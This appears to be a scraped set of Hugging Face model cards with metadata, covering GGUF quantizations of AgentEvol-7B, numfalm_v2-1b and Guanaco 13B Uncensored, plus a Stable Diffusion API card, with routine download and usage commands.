author={Shitao Xiao and Zheng Liu and Peitian Zhang and Niklas Muennighoff},
year={2023},
eprint={2309.07597},
archivePrefix={arXiv},
primaryClass={cs.CL}
}
```
## License
FlagEmbedding is licensed under the [MIT License](https://github.com/FlagOpen/FlagEmbedding/blob/master/LICENSE). The released models can be used for commercial purposes free of charge.
|
mradermacher/AgentEvol-7B-GGUF | mradermacher | "2024-06-06T15:05:18Z" | 3,602 | 0 | transformers | [
"transformers",
"gguf",
"en",
"base_model:AgentGym/AgentEvol-7B",
"endpoints_compatible",
"region:us"
] | null | "2024-06-06T13:42:09Z" | ---
base_model: AgentGym/AgentEvol-7B
language:
- en
library_name: transformers
quantized_by: mradermacher
---
## About
<!-- ### quantize_version: 2 -->
<!-- ### output_tensor_quantised: 1 -->
<!-- ### convert_type: hf -->
<!-- ### vocab_type: -->
<!-- ### tags: -->
static quants of https://huggingface.co/AgentGym/AgentEvol-7B
<!-- provided-files -->
weighted/imatrix quants seem not to be available (by me) at this time. If they do not show up a week or so after the static ones, I have probably not planned for them. Feel free to request them by opening a Community Discussion.
## Usage
If you are unsure how to use GGUF files, refer to one of [TheBloke's
READMEs](https://huggingface.co/TheBloke/KafkaLM-70B-German-V0.1-GGUF) for
more details, including on how to concatenate multi-part files.
## Provided Quants
(sorted by size, not necessarily quality. IQ-quants are often preferable over similar sized non-IQ quants)
| Link | Type | Size/GB | Notes |
|:-----|:-----|--------:|:------|
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q2_K.gguf) | Q2_K | 2.6 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_XS.gguf) | IQ3_XS | 2.9 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_S.gguf) | IQ3_S | 3.0 | beats Q3_K* |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_S.gguf) | Q3_K_S | 3.0 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ3_M.gguf) | IQ3_M | 3.2 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_M.gguf) | Q3_K_M | 3.4 | lower quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q3_K_L.gguf) | Q3_K_L | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.IQ4_XS.gguf) | IQ4_XS | 3.7 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q4_K_S.gguf) | Q4_K_S | 4.0 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q4_K_M.gguf) | Q4_K_M | 4.2 | fast, recommended |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q5_K_S.gguf) | Q5_K_S | 4.8 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q5_K_M.gguf) | Q5_K_M | 4.9 | |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q6_K.gguf) | Q6_K | 5.6 | very good quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.Q8_0.gguf) | Q8_0 | 7.3 | fast, best quality |
| [GGUF](https://huggingface.co/mradermacher/AgentEvol-7B-GGUF/resolve/main/AgentEvol-7B.f16.gguf) | f16 | 13.6 | 16 bpw, overkill |
Here is a handy graph by ikawrakow comparing some lower-quality quant
types (lower is better):

And here are Artefact2's thoughts on the matter:
https://gist.github.com/Artefact2/b5f810600771265fc1e39442288e8ec9
## FAQ / Model Request
See https://huggingface.co/mradermacher/model_requests for some answers to
questions you might have and/or if you want some other model quantized.
## Thanks
I thank my company, [nethype GmbH](https://www.nethype.de/), for letting
me use its servers and providing upgrades to my workstation to enable
this work in my free time.
<!-- end -->
|
RichardErkhov/numfa_-_numfalm_v2-1b-gguf | RichardErkhov | "2024-06-23T18:07:37Z" | 3,602 | 0 | null | [
"gguf",
"region:us"
] | null | "2024-06-23T17:57:00Z" | Quantization made by Richard Erkhov.
[Github](https://github.com/RichardErkhov)
[Discord](https://discord.gg/pvy7H8DZMG)
[Request more models](https://github.com/RichardErkhov/quant_request)
numfalm_v2-1b - GGUF
- Model creator: https://huggingface.co/numfa/
- Original model: https://huggingface.co/numfa/numfalm_v2-1b/
| Name | Quant method | Size |
| ---- | ---- | ---- |
| [numfalm_v2-1b.Q2_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q2_K.gguf) | Q2_K | 0.55GB |
| [numfalm_v2-1b.IQ3_XS.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_XS.gguf) | IQ3_XS | 0.61GB |
| [numfalm_v2-1b.IQ3_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_S.gguf) | IQ3_S | 0.63GB |
| [numfalm_v2-1b.Q3_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_S.gguf) | Q3_K_S | 0.63GB |
| [numfalm_v2-1b.IQ3_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ3_M.gguf) | IQ3_M | 0.66GB |
| [numfalm_v2-1b.Q3_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K.gguf) | Q3_K | 0.68GB |
| [numfalm_v2-1b.Q3_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_M.gguf) | Q3_K_M | 0.68GB |
| [numfalm_v2-1b.Q3_K_L.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q3_K_L.gguf) | Q3_K_L | 0.72GB |
| [numfalm_v2-1b.IQ4_XS.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ4_XS.gguf) | IQ4_XS | 0.73GB |
| [numfalm_v2-1b.Q4_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_0.gguf) | Q4_0 | 0.75GB |
| [numfalm_v2-1b.IQ4_NL.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.IQ4_NL.gguf) | IQ4_NL | 0.76GB |
| [numfalm_v2-1b.Q4_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K_S.gguf) | Q4_K_S | 0.79GB |
| [numfalm_v2-1b.Q4_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K.gguf) | Q4_K | 0.83GB |
| [numfalm_v2-1b.Q4_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_K_M.gguf) | Q4_K_M | 0.83GB |
| [numfalm_v2-1b.Q4_1.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q4_1.gguf) | Q4_1 | 0.83GB |
| [numfalm_v2-1b.Q5_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_0.gguf) | Q5_0 | 0.9GB |
| [numfalm_v2-1b.Q5_K_S.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K_S.gguf) | Q5_K_S | 0.91GB |
| [numfalm_v2-1b.Q5_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K.gguf) | Q5_K | 0.95GB |
| [numfalm_v2-1b.Q5_K_M.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_K_M.gguf) | Q5_K_M | 0.95GB |
| [numfalm_v2-1b.Q5_1.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q5_1.gguf) | Q5_1 | 0.97GB |
| [numfalm_v2-1b.Q6_K.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q6_K.gguf) | Q6_K | 1.11GB |
| [numfalm_v2-1b.Q8_0.gguf](https://huggingface.co/RichardErkhov/numfa_-_numfalm_v2-1b-gguf/blob/main/numfalm_v2-1b.Q8_0.gguf) | Q8_0 | 1.36GB |
Original model description:
---
license: apache-2.0
language:
- en
- th
library_name: transformers
pipeline_tag: text-generation
---
# NumFa v2 (1B)
NumFa v2 1B is a LLM pretrained that has 1B.
Base model: TinyLLama
**For testing only**
## Model Details
### Model Description
The model was trained by TPU.
This is the model card of a 🤗 transformers model that has been pushed on the Hub. This model card has been automatically generated.
- **Developed by:** NumFa
- **Model type:** text-generation
- **Language(s) (NLP):** English
- **License:** apache-2.0
### Out-of-Scope Use
Math, Coding, and other language
## Bias, Risks, and Limitations
The model can has a bias from dataset. Use at your own risks!
## How to Get Started with the Model
Use the code below to get started with the model.
**Example**
```python
# !pip install accelerate sentencepiece transformers bitsandbytes
import torch
from transformers import pipeline
pipe = pipeline("text-generation", model="numfa/numfa_v2-1b", torch_dtype=torch.bfloat16, device_map="auto")
# We use the tokenizer's chat template to format each message - see https://huggingface.co/docs/transformers/main/en/chat_templating
outputs = pipe("test is", max_new_tokens=300, do_sample=True, temperature=0.9, top_k=50, top_p=0.95, no_repeat_ngram_size=2,typical_p=1.)
print(outputs[0]["generated_text"])
```
|
stablediffusionapi/disney-pixar-cartoon | stablediffusionapi | "2023-07-12T15:29:05Z" | 3,596 | 29 | diffusers | [
"diffusers",
"stablediffusionapi.com",
"stable-diffusion-api",
"text-to-image",
"ultra-realistic",
"license:creativeml-openrail-m",
"autotrain_compatible",
"endpoints_compatible",
"diffusers:StableDiffusionPipeline",
"region:us"
] | text-to-image | "2023-07-12T15:26:19Z" | ---
license: creativeml-openrail-m
tags:
- stablediffusionapi.com
- stable-diffusion-api
- text-to-image
- ultra-realistic
pinned: true
---
# Disney Pixar Cartoon type B API Inference

## Get API Key
Get API key from [Stable Diffusion API](http://stablediffusionapi.com/), No Payment needed.
Replace Key in below code, change **model_id** to "disney-pixar-cartoon"
Coding in PHP/Node/Java etc? Have a look at docs for more code examples: [View docs](https://stablediffusionapi.com/docs)
Try model for free: [Generate Images](https://stablediffusionapi.com/models/disney-pixar-cartoon)
Model link: [View model](https://stablediffusionapi.com/models/disney-pixar-cartoon)
Credits: [View credits](https://civitai.com/?query=Disney%20Pixar%20Cartoon%20type%20B)
View all models: [View Models](https://stablediffusionapi.com/models)
import requests
import json
url = "https://stablediffusionapi.com/api/v3/dreambooth"
payload = json.dumps({
"key": "your_api_key",
"model_id": "disney-pixar-cartoon",
"prompt": "ultra realistic close up portrait ((beautiful pale cyberpunk female with heavy black eyeliner)), blue eyes, shaved side haircut, hyper detail, cinematic lighting, magic neon, dark red city, Canon EOS R3, nikon, f/1.4, ISO 200, 1/160s, 8K, RAW, unedited, symmetrical balance, in-frame, 8K",
"negative_prompt": "painting, extra fingers, mutated hands, poorly drawn hands, poorly drawn face, deformed, ugly, blurry, bad anatomy, bad proportions, extra limbs, cloned face, skinny, glitchy, double torso, extra arms, extra hands, mangled fingers, missing lips, ugly face, distorted face, extra legs, anime",
"width": "512",
"height": "512",
"samples": "1",
"num_inference_steps": "30",
"safety_checker": "no",
"enhance_prompt": "yes",
"seed": None,
"guidance_scale": 7.5,
"multi_lingual": "no",
"panorama": "no",
"self_attention": "no",
"upscale": "no",
"embeddings": "embeddings_model_id",
"lora": "lora_model_id",
"webhook": None,
"track_id": None
})
headers = {
'Content-Type': 'application/json'
}
response = requests.request("POST", url, headers=headers, data=payload)
print(response.text)
> Use this coupon code to get 25% off **DMGG0RBN** |
TheBloke/Guanaco-13B-Uncensored-GGUF | TheBloke | "2023-09-27T12:48:28Z" | 3,592 | 29 | transformers | [
"transformers",
"gguf",
"llama",
"conversational",
"en",
"dataset:Fredithefish/openassistant-guanaco-unfiltered",
"base_model:Fredithefish/Guanaco-13B-Uncensored",
"license:apache-2.0",
"text-generation-inference",
"region:us"
] | text-generation | "2023-09-08T08:03:08Z" | ---
language:
- en
license: apache-2.0
library_name: transformers
datasets:
- Fredithefish/openassistant-guanaco-unfiltered
model_name: Guanaco 13B Uncensored
base_model: Fredithefish/Guanaco-13B-Uncensored
inference: false
model_creator: Fredithefish
model_type: llama
pipeline_tag: conversational
prompt_template: '### Human: {prompt}
### Assistant:
'
quantized_by: TheBloke
---
<!-- header start -->
<!-- 200823 -->
<div style="width: auto; margin-left: auto; margin-right: auto">
<img src="https://i.imgur.com/EBdldam.jpg" alt="TheBlokeAI" style="width: 100%; min-width: 400px; display: block; margin: auto;">
</div>
<div style="display: flex; justify-content: space-between; width: 100%;">
<div style="display: flex; flex-direction: column; align-items: flex-start;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://discord.gg/theblokeai">Chat & support: TheBloke's Discord server</a></p>
</div>
<div style="display: flex; flex-direction: column; align-items: flex-end;">
<p style="margin-top: 0.5em; margin-bottom: 0em;"><a href="https://www.patreon.com/TheBlokeAI">Want to contribute? TheBloke's Patreon page</a></p>
</div>
</div>
<div style="text-align:center; margin-top: 0em; margin-bottom: 0em"><p style="margin-top: 0.25em; margin-bottom: 0em;">TheBloke's LLM work is generously supported by a grant from <a href="https://a16z.com">andreessen horowitz (a16z)</a></p></div>
<hr style="margin-top: 1.0em; margin-bottom: 1.0em;">
<!-- header end -->
# Guanaco 13B Uncensored - GGUF
- Model creator: [Fredithefish](https://huggingface.co/Fredithefish)
- Original model: [Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored)
<!-- description start -->
## Description
This repo contains GGUF format model files for [Fredithefish's Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored).
<!-- description end -->
<!-- README_GGUF.md-about-gguf start -->
### About GGUF
GGUF is a new format introduced by the llama.cpp team on August 21st 2023. It is a replacement for GGML, which is no longer supported by llama.cpp. GGUF offers numerous advantages over GGML, such as better tokenisation, and support for special tokens. It is also supports metadata, and is designed to be extensible.
Here is an incomplate list of clients and libraries that are known to support GGUF:
* [llama.cpp](https://github.com/ggerganov/llama.cpp). The source project for GGUF. Offers a CLI and a server option.
* [text-generation-webui](https://github.com/oobabooga/text-generation-webui), the most widely used web UI, with many features and powerful extensions. Supports GPU acceleration.
* [KoboldCpp](https://github.com/LostRuins/koboldcpp), a fully featured web UI, with GPU accel across all platforms and GPU architectures. Especially good for story telling.
* [LM Studio](https://lmstudio.ai/), an easy-to-use and powerful local GUI for Windows and macOS (Silicon), with GPU acceleration.
* [LoLLMS Web UI](https://github.com/ParisNeo/lollms-webui), a great web UI with many interesting and unique features, including a full model library for easy model selection.
* [Faraday.dev](https://faraday.dev/), an attractive and easy to use character-based chat GUI for Windows and macOS (both Silicon and Intel), with GPU acceleration.
* [ctransformers](https://github.com/marella/ctransformers), a Python library with GPU accel, LangChain support, and OpenAI-compatible AI server.
* [llama-cpp-python](https://github.com/abetlen/llama-cpp-python), a Python library with GPU accel, LangChain support, and OpenAI-compatible API server.
* [candle](https://github.com/huggingface/candle), a Rust ML framework with a focus on performance, including GPU support, and ease of use.
<!-- README_GGUF.md-about-gguf end -->
<!-- repositories-available start -->
## Repositories available
* [AWQ model(s) for GPU inference.](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-AWQ)
* [GPTQ models for GPU inference, with multiple quantisation parameter options.](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GPTQ)
* [2, 3, 4, 5, 6 and 8-bit GGUF models for CPU+GPU inference](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF)
* [Fredithefish's original unquantised fp16 model in pytorch format, for GPU inference and for further conversions](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored)
<!-- repositories-available end -->
<!-- prompt-template start -->
## Prompt template: Guanaco
```
### Human: {prompt}
### Assistant:
```
<!-- prompt-template end -->
<!-- licensing start -->
## Licensing
The creator of the source model has listed its license as `apache-2.0`, and this quantization has therefore used that same license.
As this model is based on Llama 2, it is also subject to the Meta Llama 2 license terms, and the license files for that are additionally included. It should therefore be considered as being claimed to be licensed under both licenses. I contacted Hugging Face for clarification on dual licensing but they do not yet have an official position. Should this change, or should Meta provide any feedback on this situation, I will update this section accordingly.
In the meantime, any questions regarding licensing, and in particular how these two licenses might interact, should be directed to the original model repository: [Fredithefish's Guanaco 13B Uncensored](https://huggingface.co/Fredithefish/Guanaco-13B-Uncensored).
<!-- licensing end -->
<!-- compatibility_gguf start -->
## Compatibility
These quantised GGUFv2 files are compatible with llama.cpp from August 27th onwards, as of commit [d0cee0d36d5be95a0d9088b674dbb27354107221](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221)
They are also compatible with many third party UIs and libraries - please see the list at the top of this README.
## Explanation of quantisation methods
<details>
<summary>Click to see details</summary>
The new methods available are:
* GGML_TYPE_Q2_K - "type-1" 2-bit quantization in super-blocks containing 16 blocks, each block having 16 weight. Block scales and mins are quantized with 4 bits. This ends up effectively using 2.5625 bits per weight (bpw)
* GGML_TYPE_Q3_K - "type-0" 3-bit quantization in super-blocks containing 16 blocks, each block having 16 weights. Scales are quantized with 6 bits. This end up using 3.4375 bpw.
* GGML_TYPE_Q4_K - "type-1" 4-bit quantization in super-blocks containing 8 blocks, each block having 32 weights. Scales and mins are quantized with 6 bits. This ends up using 4.5 bpw.
* GGML_TYPE_Q5_K - "type-1" 5-bit quantization. Same super-block structure as GGML_TYPE_Q4_K resulting in 5.5 bpw
* GGML_TYPE_Q6_K - "type-0" 6-bit quantization. Super-blocks with 16 blocks, each block having 16 weights. Scales are quantized with 8 bits. This ends up using 6.5625 bpw
Refer to the Provided Files table below to see what files use which methods, and how.
</details>
<!-- compatibility_gguf end -->
<!-- README_GGUF.md-provided-files start -->
## Provided files
| Name | Quant method | Bits | Size | Max RAM required | Use case |
| ---- | ---- | ---- | ---- | ---- | ----- |
| [guanaco-13b-uncensored.Q2_K.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q2_K.gguf) | Q2_K | 2 | 5.43 GB| 7.93 GB | smallest, significant quality loss - not recommended for most purposes |
| [guanaco-13b-uncensored.Q3_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_S.gguf) | Q3_K_S | 3 | 5.66 GB| 8.16 GB | very small, high quality loss |
| [guanaco-13b-uncensored.Q3_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_M.gguf) | Q3_K_M | 3 | 6.34 GB| 8.84 GB | very small, high quality loss |
| [guanaco-13b-uncensored.Q3_K_L.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q3_K_L.gguf) | Q3_K_L | 3 | 6.93 GB| 9.43 GB | small, substantial quality loss |
| [guanaco-13b-uncensored.Q4_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_0.gguf) | Q4_0 | 4 | 7.37 GB| 9.87 GB | legacy; small, very high quality loss - prefer using Q3_K_M |
| [guanaco-13b-uncensored.Q4_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_K_S.gguf) | Q4_K_S | 4 | 7.41 GB| 9.91 GB | small, greater quality loss |
| [guanaco-13b-uncensored.Q4_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q4_K_M.gguf) | Q4_K_M | 4 | 7.87 GB| 10.37 GB | medium, balanced quality - recommended |
| [guanaco-13b-uncensored.Q5_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_0.gguf) | Q5_0 | 5 | 8.97 GB| 11.47 GB | legacy; medium, balanced quality - prefer using Q4_K_M |
| [guanaco-13b-uncensored.Q5_K_S.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_K_S.gguf) | Q5_K_S | 5 | 8.97 GB| 11.47 GB | large, low quality loss - recommended |
| [guanaco-13b-uncensored.Q5_K_M.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q5_K_M.gguf) | Q5_K_M | 5 | 9.23 GB| 11.73 GB | large, very low quality loss - recommended |
| [guanaco-13b-uncensored.Q6_K.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q6_K.gguf) | Q6_K | 6 | 10.68 GB| 13.18 GB | very large, extremely low quality loss |
| [guanaco-13b-uncensored.Q8_0.gguf](https://huggingface.co/TheBloke/Guanaco-13B-Uncensored-GGUF/blob/main/guanaco-13b-uncensored.Q8_0.gguf) | Q8_0 | 8 | 13.83 GB| 16.33 GB | very large, extremely low quality loss - not recommended |
**Note**: the above RAM figures assume no GPU offloading. If layers are offloaded to the GPU, this will reduce RAM usage and use VRAM instead.
<!-- README_GGUF.md-provided-files end -->
<!-- README_GGUF.md-how-to-download start -->
## How to download GGUF files
**Note for manual downloaders:** You almost never want to clone the entire repo! Multiple different quantisation formats are provided, and most users only want to pick and download a single file.
The following clients/libraries will automatically download models for you, providing a list of available models to choose from:
- LM Studio
- LoLLMS Web UI
- Faraday.dev
### In `text-generation-webui`
Under Download Model, you can enter the model repo: TheBloke/Guanaco-13B-Uncensored-GGUF and below it, a specific filename to download, such as: guanaco-13b-uncensored.q4_K_M.gguf.
Then click Download.
### On the command line, including multiple files at once
I recommend using the `huggingface-hub` Python library:
```shell
pip3 install huggingface-hub>=0.17.1
```
Then you can download any individual model file to the current directory, at high speed, with a command like this:
```shell
huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF guanaco-13b-uncensored.q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
```
<details>
<summary>More advanced huggingface-cli download usage</summary>
You can also download multiple files at once with a pattern:
```shell
huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF --local-dir . --local-dir-use-symlinks False --include='*Q4_K*gguf'
```
For more documentation on downloading with `huggingface-cli`, please see: [HF -> Hub Python Library -> Download files -> Download from the CLI](https://huggingface.co/docs/huggingface_hub/guides/download#download-from-the-cli).
To accelerate downloads on fast connections (1Gbit/s or higher), install `hf_transfer`:
```shell
pip3 install hf_transfer
```
And set environment variable `HF_HUB_ENABLE_HF_TRANSFER` to `1`:
```shell
HUGGINGFACE_HUB_ENABLE_HF_TRANSFER=1 huggingface-cli download TheBloke/Guanaco-13B-Uncensored-GGUF guanaco-13b-uncensored.q4_K_M.gguf --local-dir . --local-dir-use-symlinks False
```
Windows CLI users: Use `set HUGGINGFACE_HUB_ENABLE_HF_TRANSFER=1` before running the download command.
</details>
<!-- README_GGUF.md-how-to-download end -->
<!-- README_GGUF.md-how-to-run start -->
## Example `llama.cpp` command
Make sure you are using `llama.cpp` from commit [d0cee0d36d5be95a0d9088b674dbb27354107221](https://github.com/ggerganov/llama.cpp/commit/d0cee0d36d5be95a0d9088b674dbb27354107221) or later.
```shell
./main -ngl 32 -m guanaco-13b-uncensored.q4_K_M.gguf --color -c 4096 --temp 0.7 --repeat_penalty 1.1 -n -1 -p "### Human: {prompt}\n### Assistant:"
```
Change `-ngl 32` to the number of layers to offload to GPU. Remove it if you don't have GPU acceleration.
Change `-c 4096` to the desired sequence length. For extended sequence models - eg 8K, 16K, 32K - the necessary RoPE scaling parameters are read from the GGUF file and set by llama.cpp automatically.
If you want to have a chat-style conversation, replace the `-p <PROMPT>` argument with `-i -ins`
For other parameters and how to use them, please refer to [the llama.cpp documentation](https://github.com/ggerganov/llama.cpp/blob/master/examples/main/README.md)
## How to run in `text-generation-webui`
Further instructions here: [text-generation-webui/docs/llama.cpp.md](https://github.com/oobabooga/text-generation-webui/blob/main/docs/llama.cpp.md).
## How to run from Python code
You can use GGUF models from Python using the [llama-cpp-python](https://github.com/abetlen/llama-cpp-python) or [ctransformers](https://github.com/marella/ctransformers) libraries.
### How to load this model from Python using ctransformers
#### First install the package
```bash
# Base ctransformers with no GPU acceleration
pip install ctransformers>=0.2.24
# Or with CUDA GPU acceleration
pip install ctransformers[cuda]>=0.2.24
# Or with ROCm GPU acceleration
CT_HIPBLAS=1 pip install ctransformers>=0.2.24 --no-binary ctransformers
# Or with Metal GPU acceleration for macOS systems
CT_METAL=1 pip install ctransformers>=0.2.24 --no-binary ctransformers
```
#### Simple example code to load one of these GGUF models
```python
from ctransformers import AutoModelForCausalLM
# Set gpu_layers to the number of layers to offload to GPU. Set to 0 if no GPU acceleration is available on your system.
llm = AutoModelForCausalLM.from_pretrained("TheBloke/Guanaco-13B-Uncensored-GGUF", model_file="guanaco-13b-uncensored.q4_K_M.gguf", model_type="llama", gpu_layers=50)
print(llm("AI is going to"))
```
## How to use with LangChain
Here's guides on using llama-cpp-python or ctransformers with LangChain:
* [LangChain + llama-cpp-python](https://python.langchain.com/docs/integrations/llms/llamacpp)
* [LangChain + ctransformers](https://python.langchain.com/docs/integrations/providers/ctransformers)
<!-- README_GGUF.md-how-to-run end -->
<!-- footer start -->
<!-- 200823 -->
## Discord
For further support, and discussions on these models and AI in general, join us at:
[TheBloke AI's Discord server](https://discord.gg/theblokeai)
## Thanks, and how to contribute
Thanks to the [chirper.ai](https://chirper.ai) team!
Thanks to Clay from [gpus.llm-utils.org](llm-utils)!
I've had a lot of people ask if they can contribute. I enjoy providing models and helping people, and would love to be able to spend even more time doing it, as well as expanding into new projects like fine tuning/training.
If you're able and willing to contribute it will be most gratefully received and will help me to keep providing more models, and to start work on new AI projects.
Donaters will get priority support on any and all AI/LLM/model questions and requests, access to a private Discord room, plus other benefits.
* Patreon: https://patreon.com/TheBlokeAI
* Ko-Fi: https://ko-fi.com/TheBlokeAI
**Special thanks to**: Aemon Algiz.
**Patreon special mentions**: Alicia Loh, Stephen Murray, K, Ajan Kanaga, RoA, Magnesian, Deo Leter, Olakabola, Eugene Pentland, zynix, Deep Realms, Raymond Fosdick, Elijah Stavena, Iucharbius, Erik Bjäreholt, Luis Javier Navarrete Lozano, Nicholas, theTransient, John Detwiler, alfie_i, knownsqashed, Mano Prime, Willem Michiel, Enrico Ros, LangChain4j, OG, Michael Dempsey, Pierre Kircher, Pedro Madruga, James Bentley, Thomas Belote, Luke @flexchar, Leonard Tan, Johann-Peter Hartmann, Illia Dulskyi, Fen Risland, Chadd, S_X, Jeff Scroggin, Ken Nordquist, Sean Connelly, Artur Olbinski, Swaroop Kallakuri, Jack West, Ai Maven, David Ziegler, Russ Johnson, transmissions 11, John Villwock, Alps Aficionado, Clay Pascal, Viktor Bowallius, Subspace Studios, Rainer Wilmers, Trenton Dambrowitz, vamX, Michael Levine, 준교 김, Brandon Frisco, Kalila, Trailburnt, Randy H, Talal Aujan, Nathan Dryer, Vadim, 阿明, ReadyPlayerEmma, Tiffany J. Kim, George Stoitzev, Spencer Kim, Jerry Meng, Gabriel Tamborski, Cory Kujawski, Jeffrey Morgan, Spiking Neurons AB, Edmond Seymore, Alexandros Triantafyllidis, Lone Striker, Cap'n Zoog, Nikolai Manek, danny, ya boyyy, Derek Yates, usrbinkat, Mandus, TL, Nathan LeClaire, subjectnull, Imad Khwaja, webtim, Raven Klaugh, Asp the Wyvern, Gabriel Puliatti, Caitlyn Gatomon, Joseph William Delisle, Jonathan Leane, Luke Pendergrass, SuperWojo, Sebastain Graf, Will Dee, Fred von Graf, Andrey, Dan Guido, Daniel P. Andersen, Nitin Borwankar, Elle, Vitor Caleffi, biorpg, jjj, NimbleBox.ai, Pieter, Matthew Berman, terasurfer, Michael Davis, Alex, Stanislav Ovsiannikov
Thank you to all my generous patrons and donaters!
And thank you again to a16z for their generous grant.
<!-- footer end -->
<!-- original-model-card start -->
# Original model card: Fredithefish's Guanaco 13B Uncensored
<img src="https://huggingface.co/Fredithefish/Guanaco-3B-Uncensored/resolve/main/Guanaco-Uncensored.jpg" alt="Alt Text" width="295"/>
# ✨ Guanaco - 13B - Uncensored ✨
